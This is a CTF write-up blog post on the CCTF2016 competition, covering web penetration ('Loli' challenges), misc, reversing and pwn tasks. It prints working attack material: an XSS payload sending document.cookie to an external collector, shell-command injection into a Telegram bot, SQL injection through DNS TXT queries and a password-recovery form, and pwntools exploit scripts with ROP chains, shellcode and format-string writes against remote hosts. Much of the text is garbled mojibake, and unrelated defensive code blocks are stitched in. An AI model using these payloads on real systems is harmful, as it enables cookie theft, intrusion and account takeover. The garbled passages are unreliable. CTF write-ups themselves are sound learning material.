LoRexxar's Blog

CCTF2016_writeup

2016/04/25

A couple of days ago I played cctf, organised by 0xFA, and was lucky enough to get a decent placing.

A quick tidy-up of the write-up.

pentest

IDS-Chicken

I didn't get this one out during the competition, and after reading the write-up found I'd been just a tiny bit short…
http://c-chicken.cc/ctf/2016/04/25/IDS-Writeup.html

First, opening it up shows it's an IDS: if it detects a mysql error, the request gets logged to the backend.
I started trying injection, but since select was filtered it was useless, nothing of value could be injected; later a hint was given, and it turned out this wasn't the injection challenge I first assumed.

http://ids.c-chicken.cc/upload/
http://ids.c-chicken.cc/upload.php
http://ids.c-chicken.cc/conn.php
http://ids.c-chicken.cc/index.php
http://ids.c-chicken.cc/cgi-bin/
http://ids.c-chicken.cc/cgi-bin/printenv.cgi

…as for the last one, I never found it anyway….
But anyway, upload.php was found.

After a little testing, uploading anything was useless; only images got through, and even those were renamed and rewritten…

Another hint was given:
1. Multimedia files can be uploaded
2. The backend records attacks

That cleared things up a lot: the guess was that an uploaded swf file, if left unprocessed, would bypass CSP, and then you could xss whatever you wanted.
Testing showed the header must be present, but if you build a js file, the header at the front throws an error (CWS is not defined) and execution stops (at the time I couldn't think of a way round it; later the challenge author's approach showed that you declare an id so it doesn't error, Orz). What I used, written into the file:

CWS
<script>var xml = new XMLHttpRequest(); xml.open('POST', 'http://xss.xxxxx.cc', true); xml.setRequestHeader("Content-type","application/x-www-form-urlencoded"); xml.send('cookie='+document.cookie); </script>

Then

<link rel='import' href='/upload/xxxxx'>

Submitted this way, the request is received.

鍙槸娌℃兂鍒扮殑鏄紝娴嬭瘯鐨勬椂鍊欙紝鐢变簬涓嶇煡閬撳悗鍙扮殑璁板綍鏂瑰紡鏄粈涔堟牱鐨勶紝鐚滄祴鏄笉鑳芥姤閿欐垨鑰呰琚玣uck銆傘傘傞偅涔堟垜灏变娇鐢ㄤ簡

id=1'#<link xxxxxx>

requests like this, and also sent ones with select added; later the challenge author told me that # truncates everything after it, and a request that gets "fucked" is not logged…..

So tiring….

Loli club series

Loli 2

鐩爣 锛http://www.loli.club/
鎷垮埌 Web 鐩綍涓嬬殑 flag 鏂囦欢

RR said it's a regular penetration process; the page source gives

powered by PockyNya
Front-end developers wanted, please contact: pocky@loli.club
Throwing that straight into Google found pockynya's information on github

https://github.com/PockyNya/pyprint

This code is deployed at

http://pocky.loli.club:41293/

pocky.loli.club (120.27.155.112) Hangzhou Aliyun
www.loli.club (47.89.50.241) Hong Kong Aliyun

Then the FAQ was puzzling; later it was said that the solving order has nothing to do with the challenge order.
Switching the thread to pocky.loli.club (loli2)

Looking around, I found an article on the blog

Hackers are rampant lately; I have a vague feeling my Blog is about to be visited by a bunch of hackers
So far I've taken the following measures:
Changed the password, not a simple one like username123, added special characters
Lately for Email I only click addresses I know well, such as my blog..2333
Since the blog was written in Python by a famous hacker, I'm sure it has no vulnerabilities whatsoever
The server is Aliyun, and Aliyun is definitely very secure www
Seems some oddly formatted email got added under Emails in my Github Personal settings.. ah, never mind.. shouldn't be a big deal..

The above pretty much says it all: it's not a weak password, nor a getshell challenge, and the email only clicks the blog's address, so it's clear: it should be xss

Then at this point I noticed some strange articles had appeared under post.
The post-publishing part:

class AddPostHandler(BaseHandler):
    @tornado.web.authenticated
    def get(self):
        self.background_render('add_post.html', post=None)

    def post(self):
        title = self.get_argument('title', None)
        content = self.get_argument('content', None)
        tags = self.get_argument('tags', '').strip().split(',')
        if not title or not content:
            return self.redirect('/kamisama/posts/add')
        post = self.orm.query(Post.title).filter(Post.title == title).all()
        if post:
            return self.write('<script>alert("Title has already existed");window.history.go(-1);</script>')
        self.orm.add(Post(title=title, content=content, created_time=date.today()))
        self.orm.commit()
        return self.redirect('/kamisama/posts')

Found that the add-post handler does no user authentication on post.
The idea: XSS an article to the mailbox and let PockyNya click it.

import requests

url = "http://pocky.loli.club/kamisama/posts/add"
data = {"title": "this is dong", "content": "this is dong"}
requests.post(url, data=data)

This was a really big pitfall: the cookie obtained the first time was only

username=2|1:0|10:1461382264|8:username|12:cG9ja3lueWE=|d4e540d298981e80bd48150453751ef3db7a18611d2748f0f1d8cee4484d4958

Then we got into the backend, and although we found the entrance to loli1, couldn't work out why the flag wasn't found (note: who was in charge of this one), spent 3 hours researching and decided it couldn't be broken, so xss'd once more, and this time got the flag

flag=343334333534343637623433346634343435356634313535343434393534356634323535353335343435353235333764;

The flag that came back.

>>> s = '''343334333534343637623433346634343435356634313535343434393534356634323535353335343435353235333764'''
>>> len(s)
96
>>> import binascii
>>> binascii.unhexlify(s)
'434354467b434f44455f41554449545f425553544552537d'
>>> len(binascii.unhexlify(s))
48
>>> s = binascii.unhexlify(s)
>>> binascii.unhexlify(s)
'CCTF{CODE_AUDIT_BUSTERS}'
>>>

绗竴鍙悵鑾夋崟鑾锋垚鍔熴

Logging into the backend with the cookie that came back, the backend articles are visible

Loli 1

Set up a Minecraft server at the company~ using the official server, high performance~ Wrote a telegram bot to manage starting and stopping Minecraft, a few lines of lua, very simple~ Code as follows:

do
  local function run(msg, matches)
    if matches[1] ~= '!minecraft' then
      operation = matches[1]
    else
      return "!minecraft start|stop|restart"
    end
    if string.find(operation, '&') or string.find(operation, '|') or string.find(operation, '`') then
      return "Invalid operation " .. operation
    end
    local t = io.popen('cd /home/telegram && ./mc ' .. operation)
    local a = t:read("*all")
    return a
  end
  return {
    description = "loli.club minecraft bot!",
    usage = "!minecraft start|stop|restart",
    patterns = {
      "^!minecraft$",
      "^!minecraft (.*)$"
    },
    run = run
  }
end

Search for PockyNya on telegram (the silliest thing is there's an account called pockybot on telegram…); it's definitely the one with the cutest avatar.

!minecraft ;ls /home/wwwroot
!minecraft ;cat /home/wwwroot/flag

CCTF{TELEGRAM_BOT_AND_Lf}

RR said the bot was no more use once the flag was taken, so we didn't keep playing with it♂; oh, and this file is called flag
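The bot above checks the operation word against a denylist of three shell metacharacters and then hands it to a shell via io.popen, which is why a `;` slips through. The following is an added example, not the bot's own code: a Python re-implementation of that denylist check beside an allowlist version that only accepts the three operations the usage string names and runs the helper without a shell. The path /home/telegram/mc is taken from the bot's io.popen call; the sample inputs are constructed here.

```python
import subprocess

# The bot's original filter, re-implemented: a denylist of three metacharacters.
DENYLIST = ("&", "|", "`")

# Hardened form: the usage string already enumerates every valid operation.
ALLOWED_OPERATIONS = ("start", "stop", "restart")


def denylist_accepts(operation):
    """True when the original check would let `operation` reach io.popen()."""
    return not any(ch in operation for ch in DENYLIST)


def allowlist_accepts(operation):
    """True only for an exact, known operation word; anything else is refused."""
    return operation in ALLOWED_OPERATIONS


def build_command(operation):
    """argv for the hardened bot: ./mc is run directly, never through a shell.

    /home/telegram/mc is the path from the bot's own io.popen() call.
    """
    if not allowlist_accepts(operation):
        raise ValueError("Invalid operation " + operation)
    return ["/home/telegram/mc", operation]


def run_operation(operation):
    """Execute a validated operation without a shell (not invoked in this file,
    since the helper binary only exists on the bot's host)."""
    result = subprocess.run(build_command(operation), cwd="/home/telegram",
                            capture_output=True, text=True, check=False)
    return result.stdout


if __name__ == "__main__":
    # Constructed sample inputs: two legitimate words and two that the
    # denylist handles differently from the allowlist.
    for op in ("start", "restart", ";ls /home/wwwroot", "start|id"):
        print("%-20r denylist=%-5s allowlist=%s"
              % (op, denylist_accepts(op), allowlist_accepts(op)))
```

The allowlist makes the shell question moot: even if a future helper were invoked through a shell, the argument can only ever be one of three fixed words.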

Loli 3

Internal network penetration

鎵煙鍚嶄笉鏄垎鐮存垜ns鏈嶅姟鍣..鑰屼笖ns鏈嶅姟鍣ㄦ槸pockynya鐢╬ython鍜宮ysql寮鍙戠殑锛屼細鏈変粈涔堟紡娲炲憿..

Get Hint!
After finding ns.loli.club, tested it: no zone transfer vulnerability.
Then tried A records, AAAA records and TXT records. P.S. RR also tested; other record types aren't supported.
Found that the TXT record of pocky.loli.club returns "GOGOGO"
So the guess is that the TXT record is stored in a mysql field.
The query conditions are txt and domain
And so this challenge turned into regular web injection

dig @ns.loli.club -t txt "pocky.loli.club'&&if(mid(version(),1,1)=5,1,0)#"
dig @ns.loli.club -t txt "pocky.loli.club'&&if(mid(version(),1,1)=6,1,0)#"

The results confirmed the injection exists.
union injection found that
the dns database holds only one table, hosts,
and the hosts table holds only seven records, none of them useful.
So it's get system shell.
Started mindlessly shortening the payload
and found
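The record lookup the DNS server performs is a string-built SQL query, which is why a quote inside the queried name is parsed as SQL. The following is an added example, not the challenge's code: a miniature of that TXT lookup written against sqlite3 so it runs offline, with the vulnerable string-formatted query beside a bound-parameter version. The hosts table, its column names (domain, type, txt) and the rows are assumptions modelled on the description above; the dialect-specific probe from the dig commands fails with a syntax error in sqlite, which is the same error signal the page's blind probes rely on.

```python
import sqlite3

# Constructed sample table, modelled on the page's description of a "hosts"
# table queried by domain and record type (column names are assumptions).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE hosts (domain TEXT, type TEXT, txt TEXT)")
    db.execute("INSERT INTO hosts VALUES ('pocky.loli.club', 'TXT', 'GOGOGO')")
    db.execute("INSERT INTO hosts VALUES ('www.loli.club', 'A', '47.89.50.241')")
    return db


def lookup_txt_vulnerable(db, name):
    """String formatting: the queried name is parsed as SQL, so a quote
    inside it terminates the literal and the rest becomes part of the query."""
    sql = "SELECT txt FROM hosts WHERE type='TXT' AND domain='%s'" % name
    return [row[0] for row in db.execute(sql)]


def lookup_txt_safe(db, name):
    """Bound parameter: the whole name is compared as a value and never parsed,
    whatever characters it contains."""
    sql = "SELECT txt FROM hosts WHERE type='TXT' AND domain=?"
    return [row[0] for row in db.execute(sql, (name,))]


def probe(db, lookup, name):
    """Run a lookup and return (rows, error_name) instead of raising, so the
    difference between 'no such record' and 'query broke' is observable."""
    try:
        return lookup(db, name), None
    except sqlite3.Error as exc:
        return None, type(exc).__name__


if __name__ == "__main__":
    db = make_db()
    for name in ("pocky.loli.club",
                 "pocky.loli.club' OR '1'='1",
                 "pocky.loli.club'&&if(mid(version(),1,1)=5,1,0)#"):
        print(repr(name))
        print("  vulnerable:", probe(db, lookup_txt_vulnerable, name))
        print("  safe:      ", probe(db, lookup_txt_safe, name))
```

With the bound parameter the tautology and the error-based probe both return an empty result, exactly as any other nonexistent name would, so neither the data nor an error message leaks through the TXT answer.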

dig @ns.loli.club -t txt "'union(select 1,(select name from mysql.func limit 0,1),3,4)#"

which returns sYsT3m_e
The considerate challenge author Ricter, caring for us web dogs, had already planted the UDF.

dig @ns.loli.club -t txt "'union(select 1,(select name from mysql.func limit 1,1),3,4)#"

鍙湁涓涓猣unc,澶熶簡銆傜劧鍚庝竴澶存挒鍦ㄤ簡缂╃煭payload鐨勫涓娿
浜岀嫍鍛婃垜涓轰粈涔堜笉down 鍥炶剼鏈紝鏅洪殰涓銆
鐒跺悗鎴戝枈浜嗕竴澹版垜瑕佹嬁涓琛銆傜珛flag鈥
鍙嶅脊shell涔嬪悗锛宖ind / -name flag 鏅洪殰浜屻
鐒跺悗娌℃壘鍒版嚨閫笺 璇曚簡鍏跺畠锛屼篃娌℃湁銆傚氨涓涓竴涓墜鍔ㄥ垏鐩綍銆
鎵惧埌flag鏀惧湪浜咶LAG鏂囦欢閲岄潰銆
绗笁鍙悵鑾夋崟鑾峰畬姣曘

Loli 4

RR said this was the easiest one, and had even had nmap installed for everyone.

/etc/hosts
127.0.0.1 localhost
127.0.1.1 localhost.localdomain localhost
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.47.111.200 dns

Ran nmap over the whole /21, continuing to narrow down the target.

arp -a
? (120.27.151.247) at 3c:8c:40:4e:dd:46 [ether] on eth1
? (10.47.111.247) at 3c:8c:40:4e:dd:46 [ether] on eth0
? (10.47.111.187) at 00:16:3e:01:02:8b [ether] on eth0
? (10.47.110.23) at 00:16:3e:01:03:33 [ether] on eth0
10.47.111.187 has 8080 and 80 open
8080/tcp open http nginx 1.4.6 (Ubuntu)
|_http-methods: No Allow or Public header in OPTIONS response (status code 405)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: OPS - LOLI.CLUB
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.40%I=7%D=4/24%Time=571C607D%P=x86_64-pc-linux-gnu%r(NULL
SF:,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
80/tcp open http nginx 1.4.6 (Ubuntu)
|_http-methods: No Allow or Public header in OPTIONS response (status code 405)
|_http-title: 404 Not Found

Internal network, so. Set up a socks5 proxy.
Then found an injection at forget? (password recovery).
A senior found that sqlmap could run it, but it was a bit slow.
So I did it by hand.

email=********%40qq.com') union select updatexml(0,concat(0x27,(select column_name from information_schema.columns where table_name='user' limit 7,1)),0)%23

The user table has lots of columns.. Remember our target is admin's password.
Then
select password from user where username='*
Here I fell into a pit: the password that came out was copied straight out and updated back in, but it failed.
Because the password that came out looked like md5 but was actually only 31 characters.
Why?
Error-based injection has a length limit. The full hashed password was longer than that.
So it was extracted in two pieces.

email=********%40qq.com'); update user set password='**********';%23

Then log in as admin, and the flag is right there.

All four lolis captured.

misc

Sign-in

Nothing to say; F12 inspect element and there it is..

Best_Easy_Misc

Decode the Morse. The result is 1024 characters consisting only of 0 and 9
32 * 32 = 1024
Substitute the characters and print it out.
Found it was mirrored horizontally.

#!/usr/bin/env python
# -*- coding: utf-8 -*-
output = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000099990099999900000000000000000009000090000000090000900000000000000000000000000099099000000000000000000000000000009000000000000009009000000990000000000000000000090909009009090000000000000000000909090090090900009090000000000009090900900909000090900000000000090909009009090000909000000000000999900099999000099990000000000000000000000000000000000000000000000000009000090000000000000000000900090009009000000090000000000009000900009900000000900000000000090009000099000009999000000000000099900009009000000090000000000000000000900009000000900000000000000000000000000000000000000000000999909000000000000000000000000000000000099990900900900000000000000000000000000009009000000000000099999000009900099990000000000000090000000900900000000000000000000090000009009000000000000000000000090000090090090090000000000000999990099999900900900000000000000000000000000009999'
# Render 0 as blank and 9 as a filled pixel
output = output.replace('0', ' ')
output = output.replace('9', '#')

def main():
    # 32 characters per row; each row reversed because the image is mirrored
    for j in range(0, len(output), 32):
        print(output[j:j+32][::-1])

if __name__ == '__main__':
    main()

True or False?


Hint: this is a compressed file


After getting the file, I couldn't recognise what it was; the hint said compressed file, so I searched the magic numbers of some compression formats; it looked a bit like bz2, except the first two bytes had swapped positions

Offset   0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F
00000000 5A 42 68 39 31 41 59 26 53 59 82 D2 45 B8 00 16 ZBh91AY&SY......

After swapping them back, it decompresses directly; it's tar.bz2. After extraction there are two files, True and False; throw them into IDA.
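The check above is a magic-number check: a bz2 stream starts with "BZh" followed by the block-size digit, and the challenge file had its first two bytes transposed to "ZBh". The following is an added example, not part of the original write-up: a small sniffer that recognises the header, repairs the transposition only when the swapped bytes form a valid header, and decompresses the result. The sample file is constructed in the block by compressing a short string and transposing its first two bytes the same way.

```python
import bz2

BZ2_MAGIC = b"BZh"  # followed by the block size digit '1'..'9'


def _has_bz2_header(data):
    """True if the first four bytes form a valid bz2 stream header."""
    return len(data) >= 4 and data[:3] == BZ2_MAGIC and data[3] in b"123456789"


def sniff(data):
    """Identify the container from its magic number; only bz2 is modelled here."""
    return "bz2" if _has_bz2_header(data) else "unknown"


def repair_swapped_bz2(data):
    """If the first two bytes are transposed ('ZBh9' instead of 'BZh9'), swap
    them back. Data that already has a valid header, or whose swap would not
    produce one, is returned unchanged, so the repair cannot corrupt anything."""
    swapped = data[1:2] + data[0:1] + data[2:]
    if not _has_bz2_header(data) and _has_bz2_header(swapped):
        return swapped
    return data


def recover(data):
    """Repair the header if needed and decompress."""
    return bz2.decompress(repair_swapped_bz2(data))


def make_sample():
    """Constructed sample: a real bz2 stream with its first two bytes transposed,
    mirroring the alteration described in the challenge."""
    good = bz2.compress(b"two files: True and False\n")
    return good[1:2] + good[0:1] + good[2:]


if __name__ == "__main__":
    sample = make_sample()
    print("as received:", sample[:4], sniff(sample))
    fixed = repair_swapped_bz2(sample)
    print("repaired:   ", fixed[:4], sniff(fixed))
    print(recover(sample))
```

On the real challenge file the decompressed bytes would be a tar archive (magic "ustar" at offset 257), so the same sniffing step can be chained once more before extraction.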

Both files execute commands, but that has nothing to do with the flag; in the True file, however, there is a print_f function trying to sneak past.

v14 = "yvahk-enva";
v1 = 'P';
v2 = 'P';
v3 = 'G';
v4 = 'S';
v5 = '{';
v6 = '\0';
v7 = '-';
v8 = 'o';
v9 = 'v';
v10 = 'a';
v11 = '}';
v13 = '\f';
v12 = 0;
return printf("%s%s%s\n", &v1, "yvahk-enva", &v7);

Combining the strings gives PPGS{yvahk-enva-ova}; ROT13 yields the flag: CCTF{linux-rain-bin}

EZ Game

Traffic analysis
Without opening wireshark, running strings directly shows a strange string at the very beginning

echo "Q0NURntkb195b3VfbGlrZV9zbmlmZmVyfQ==" | base64 -d
CCTF{do_you_like_sniffer}#

Freebie challenge.
Combined with the challenge requirements: find out which vulnerability's exploitation process this is.
It gets a cmd shell, so just look around and try a few.

The famous MS08067

Base{安码}

MISC1

As they said, a freebie for newbies; nothing to say

Open the image directly in Stegsolve, then look at the data and decode the base64; a space caused a slight annoyance, but tweak it a bit into something meaningful and it works

MISC2

The download is a packet capture; just flip through it, it's fairly simple. If I remember correctly the flag was sent in the clear in an http packet; a bit of searching finds it.

re1

Good news for newbies; industry conscience.

flag submission format:

CCTF{flag}

hint: the flag is whatever you solve out, yo


Straight into IDA: argc needs to be greater than 3, the big chunk of code before that is useless, look directly at the check function:

signed int __cdecl check(char *a1)
{
  signed int i; // [sp+Ch] [bp-4h]@1

  for ( i = 0; i <= 31; ++i )
  {
    if ( a1[i] != *(i + 0x8048C80) )
      return 0;
  }
  return 1;
}

It compares the input string with the contents at address 0x8048c80, and the contents at that address are:

.rodata:08048C80 aF2332291a6e1e6 db 'f2332291a6e1e6154f3cf4ad8b7504d8',0

So just run the program directly:

➜ cctf ./buffer32 f2332291a6e1e6154f3cf4ad8b7504d8 f2332291a6e1e6154f3cf4ad8b7504d8 f2332291a6e1e6154f3cf4ad8b7504d8
Aleph-One
Is The Password. Good Job !

re2

Good news for newbies; industry conscience.

flag submission format:

CCTF{flag}


Written in .net; straight into Reflector.
The program connects to port 31337 on 127.0.0.1 and sends the flag over.
Listen on that port locally, then run the program.

PS C:\Users\lightless\Desktop\PowerCat> Import-Module .\PowerCat.psd1
PS C:\Users\lightless\Desktop\PowerCat> start-powercat -port 31337
CTF{7eb67b0bb4427e0b43b40b6042670b55}

re3

Actually nothing much to write about this one.

Set a breakpoint at strcmp in od and just run it. Once it stops at the breakpoint the flag is visible right on the stack.

It was so simple that I doubted it for a while Orz

BIN

2048? 4096?

hint1: 2048? 4096? Hint: they say reaching 2048 isn't impressive, and reaching 4096 isn't either; if you don't believe it, reverse it first
hint2: 2048? 4096? Hint: is a higher score really more impressive? 2016-04-23 16:07
hint3: 2048? 4096? Hint3: fine, let's see who gets the lowest score........... 2016-04-23 18:08

So it's about finding the theoretical minimum score

https://www.zhihu.com/question/23073587

So the theoretical minimum score is 16, but what's the theoretical minimum number of moves? No idea….
No way round it, just run it and see; it came out at 22 moves in the end (could some expert tell me why?)

Difffffffffuse

Let me tell a story.

I call this challenge: one pillar holding up the sky.

First time opening it: what on earth, probably a VM or flattening, the code as tall as a pillar.

Felt it was completely undoable, opened a game, half an hour passed..... A teammate told me someone had DONE it. I thought, how, this sort of thing can't be done that fast, so I picked it up again.

.text:080BB877 mov dword ptr [esp+8], 28h ; n
.text:080BB87F lea eax, [esp+14h]
.text:080BB883 mov [esp+4], eax ; s2
.text:080BB887 lea eax, [esp+3Dh]
.text:080BB88B mov [esp], eax ; s1
.text:080BB88E call _memcmp
.text:080BB893 test eax, eax
.text:080BB895 jnz short loc_80BB8A5
.text:080BB897 mov dword ptr [esp], offset s ; "Yeap!!!"
.text:080BB89E call _puts
.text:080BB8A3 jmp short loc_80BB8B1

鍙互鐪嬪埌memcmp瀵瑰唴瀛樿繘琛屼簡姣旇緝锛屼笅鏂偣鍙戠幇鍙互杩涜鐖嗙牬銆

闇瑕佺殑缁撴灉锛

0xffffcefd: 0x83 0xec 0x5f 0xa2 0x93 0xce 0xe5 0xfb
0xffffcf05: 0x5a 0x17 0x06 0xff 0x89 0x2d 0xd7 0x6c
0xffffcf0d: 0xbe 0xce 0x8d 0x6a 0xb8 0x15 0x26 0xfc
0xffffcf15: 0x84 0x01 0x94 0x44 0xf8 0xd7 0x23 0x1c
0xffffcf1d: 0x4b 0xc2 0x31 0x04 0xa6 0x33 0x08 0x57
0xffffcf25: 0x00 0x00 0x00 0x00

However, I don't know how to patch on Linux, so could only brute-force it by hand ORZ.

Filled in 40 copies of each of 1 to 10, lowercase a to z and underscore, compared, and got this:

CCTF{1F?0u?4n?a_?3v?n93_purpleroc}

鍙互鐚滃嚭鏉ワ紝绗竴涓ぇ鍐欏瓧姣嶇粍鎴愮殑鍗曡瘝鏄痀ou锛岀浜屼釜鐢变簬鎴戠帺杩嘔 WANNA 涔熺寽鐨勫嚭鏉ワ紝绗笁涓悳涓涓?ev?nge鎵惧埌浜嗕竴涓彨鍋氬浠囩殑褰辫鍓с

CCTF{1F_Y0u_W4nNa_R3vEn93_purpleroc}

(ps: does this even count as a write-up??????)

pwn1

So what's the intended solution for this one?

The assembly itself isn't very complex. The last call ecx in main controls eip. At the same time, 8 bytes of stack arguments at the jump can be controlled.

First, 8 bytes is far too little to build a rop chain, so the stack needs to be pivoted first. Searching with ROPgadget found

0x08048662 : add byte ptr [eax], al ; lea esp, dword ptr [ebp - 0xc] ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x080486cb : sbb al, 0x5b ; pop esi ; pop edi ; pop ebp ; ret

鍙互鐢pop ebp,ret;lea esp, dword ptr [ebp - 0xc]杩欐牱鐨勫舰寮忔潵灏嗘爤杩佺Щ鍒颁换鎰忕殑鍦板潃銆傝繖閲岀洿鎺ュ皢鏍堣縼绉诲埌浣嶄簬bss娈电殑buffer缂撳啿鍖轰笂銆傝繖鏍峰瓙rop鐨勯暱搴﹀氨瓒冲浜嗐

浣嗘槸绋嬪簭寰堣幢鐨勫叧闂簡鏍囧噯杈撳叆鐨勮锛屼篃灏辨槸璇寸▼搴忓叏绋嬪彧鏈変竴娆″彲浠ュ啓鍏ョ殑鏈轰細銆傝閬撶悊杩欐牱鐨勯鐩嚭棰樹汉鏈剰鏄敤dl resolve鏉ュ埄鐢ㄧ殑銆傛垜涔熺‘瀹炲皾璇曠敤dl resolve鍐欎簡涓猵oc銆傛湰鍦扮‘瀹炴垚鍔熶簡銆備絾鏄繙绋嬫墦鐨勬椂鍊欑洿鎺G銆

Since the proper solution didn't work, the only option left was to cut corners.

First, no so library was given, so the so version has to be found first. That's manageable: since the rop chain is long enough, arbitrary address read is possible. Leak two function addresses from the got, take the difference and compare it, and you roughly know the so version.

Then bypassing aslr. No real way round it, but fortunately the program is 32-bit, so libc's load base has only 0x100 possibilities. So just brute-force libc blindly. In practice it basically produced a result within 400 attempts.

The last problem was that calling system simply terminated the program. gdb debugging showed the stack after the pivot was too small for system to use. No choice but to switch to execv. Fortunately the command-line arguments can be built directly in bss, so not a big problem.

The final script is as follows

#! /usr/bin/python
import pwn
pwn.context.log_level = 'debug'
binary = pwn.ELF('/tmp/pwn1')
libc = pwn.ELF('/tmp/libc.so.6')
showdown = 0x08048426
sh = 0x0804A060 + 0x70
pay = '134514276.134520956.134514383.aa'
cmd = "/bin/cat\x00\x00"
null = sh + len(cmd)

def main(system, target):
    def getRop():
        rop = pwn.ROP(binary)
        rop.call(system, (sh, null))
        return str(rop)
    # pwn.gdb.attach(target)
    # raw_input("debuger")
    target.recv()
    rop = getRop()
    target.sendline(pay+rop+'a'*(0x70-len(rop+pay))+cmd+pwn.p32(sh+len(cmd)+12)+pwn.p32(sh+len(cmd)+12+4)+"\x00"*4+'cat\x00'+'flag'+'\x00' * 4)
    # target.recv()
    try:
        a = target.recv()
    except EOFError:
        return
    # target.interactive()
    print a
    exit(0)

# pwn.gdb.attach(target)
# system = raw_input("system:")
# system = int(system,16) + libc.symbols['execv']
# system = 0x00040190
for i in range(10000):
    print i
    try:
        #target = pwn.process('/tmp/pwn1')
        target = pwn.remote('115.28.241.138', 9000, timeout=1)
    except:
        continue
    base = 0xb7574000
    system = base + 0x000b5d20
    # pwn.gdb.attach(target)
    # system = raw_input("system:")
    # system = int(system, 16) + libc.symbols['execv']
    main(system, target)
    target.close()

Luckily the server's network speed was fine Orz

pwn2

The program is very simple. mmap hands out a whole readable, writable and executable "new continent".

The question is how to land on the new continent?

First, 5 bytes of shellcode can be entered and execution then jumps to it. Those 5 bytes of shellcode are the crux. After 2 hours of countless wild ideas, the shellcode I finally arrived at was this

mov byte[esp],0xd2
ret

Exactly 5 bytes. First, the mov changes the function's return address to the gets line in main

.text:080484BA mov [esp+28h], eax
.text:080484BE mov eax, [esp+28h]
.text:080484C2 add eax, 0FFAh
.text:080484C7 mov [esp+2Ch], eax
.text:080484CB mov eax, [esp+2Ch]
.text:080484CF mov [esp], eax ; s
.text:080484D2 call _gets <<<<<<<-------- here
.text:080484D7 mov dword ptr [esp+8], 5 ; n
.text:080484DF mov eax, [esp+2Ch]
.text:080484E3 mov [esp+4], eax ; src
.text:080484E7 mov eax, [esp+28h]
.text:080484EB mov [esp], eax ; dest

Because it returns with ret, the whole stack stays balanced, so at the end it can jump to the "new continent" once more. And at the time of the ret the stack layout is like this

00:0000| esp 0xff997c4c --> 0x80484f9 (<main+124>: leave)
01:0004| 0xff997c50 --> 0x31337000 --> 0xd22404c6
02:0008| 0xff997c54 --> 0x31337ffa --> 0xd22404c6
03:0012| 0xff997c58 --> 0x5
04:0016| 0xff997c5c --> 0x22 (b'"')
05:0020| 0xff997c60 --> 0x0
06:0024| 0xff997c64 --> 0x0

The argument after returning is exactly the start address of the mmap region, and that length is enough to write the shellcode.

The final script, as follows

#! /usr/bin/python
import pwn
#target = pwn.process('/tmp/pwn2')
target = pwn.remote("120.27.130.77",9000)
shellcode = "\xeb\x08\x61\x61\x61\x61\x41\x41\x41\x41\x68\x2f\x73\x68\xff\x68\x2f\x62\x69\x6e\x8d\x1c" \
"\x24\x31\xc0\x88\x43\x07\x50\x53\x89\xe1\x8d\x51\x04\x83\xc0\x0b\xcd\x80\x31\xc0\x40\x31" \
"\xdb\xcd\x80"
#pwn.gdb.attach(target)
#raw_input('debuger')
target.sendline('\xc6\x04\x24\xd2\xc3')
target.sendline(shellcode + 'a' * (4090 - len(shellcode)) + '\xeb\x08aaa')
target.interactive()

The end; sprinkling shellcode instead of confetti

pwn3

After getting it and looking for a while: the program first does a check, adding 1 to each input character and comparing with "sysbdmin"
Once in, there are 3 functions
1. putfile <- mallocs a chunk of memory to hold the file name and content
2. getfile <- input a file name, output the content (has a format string vulnerability, and the content also ends up on the stack)
3. show_dir <- stores all file names in an array and prints the array, without separating them; format string

So the next steps are natural
1. Get libc's relative position through getfile's format string
2. Since the content is controllable and also sits on the stack, a pointer to got@plt can be constructed, and then %n (overwrites the value the pointer points at with the number of characters output so far) can be used to modify the got

But there are a few problems
1. Although memory can be overwritten via %n, what we want to write is an address value, which generally means outputting a great many characters
2. Which address to overwrite with
3. Which function to overwrite

绗竴涓棶棰橈紝鍥犱负鍐欏叆鐨勬槸4瀛楄妭锛屾墍浠ユ垜浠彲浠ュ啓4娆★紝浣庝綅鍐欏埌楂樹綅锛屾瘡娆℃敼1瀛楄妭锛岃繖鏍锋渶澶氳緭鍑哄瓧绗︿篃灏辨槸256*4浜
姣斿 0x12345678 -> 0xdeadbeef 鍏堝啓鍏0xef 鐒跺悗寰涓婄Щ涓瀛楄妭鍐0xbe 杩欐牱灏辨湁浜0x0000beef 鈥
绗簩涓棶棰橈紝鏃㈢劧瑕佹敼锛屽綋鐒舵敼鎴恠ystem锛屽墠闈㈠彲浠ユ嬁鍒發ibc鐨勭浉瀵瑰湴鍧锛岃櫧鐒朵笉鐭ラ亾libc鐗堟湰锛屼笉杩囧彲浠ヨ窇鍟
绗笁涓棶棰橈紝鎴戜滑閫夌殑鍑芥暟搴旇鏄鑳芥帶鍒跺弬鏁扮殑锛岃屼笖鍦╣etfile涓笉浼氭秹鍙婂埌鐨勫嚱鏁帮紝涓寮濮嬫壘鎵句笉鍒帮紝鐒跺悗鎵嶅彂鐜皊how_dir鐨刾uts灏卞彲浠ャ傘傘傚洜涓簊how_dir鐨刾uts鐨勫弬鏁版槸鏂囦欢鍚嶏紝鑰屼笖puts鍦╣etfile涓彧鏈夎緭鍏lag鎵嶄細瑙﹀彂锛屾墍浠ュ苟涓嶇敤鎷呭績銆備簬鏄瘡娆¤緭鍏モ/bin/sh鈥濈殑涓涓瓧鑺傚氨鑳藉噾鍑烘潵鍙傛暟

ps: right when my test printed 0, I got the shell
shell
payload:

from pwn import *
#context.log_level = 'debug'
#R = process('./pwn3')
R=remote('120.27.155.82',9000)

def setvalue(addr,value):
    a=['i','n','/','s']
    for i in range(0,4):
        R.write('put\n')
        R.recvuntil(':')
        R.write(a[3-i]+'\n')
        R.recvuntil(':')
        R.write('%'+'%03d'%((value>>(8*i)&0xff)-2)+'x'+' '+'%10$n'+p32(addr+i)+'\n')
        R.recvuntil('>')
        R.write('get\n')
        R.recvuntil(':')
        R.write(a[3-i]+'\n')
        R.recvuntil('>')
        i+=1

for i in range(0,1000):
    R.recvuntil(':')
    R.write('rxraclhm\n')
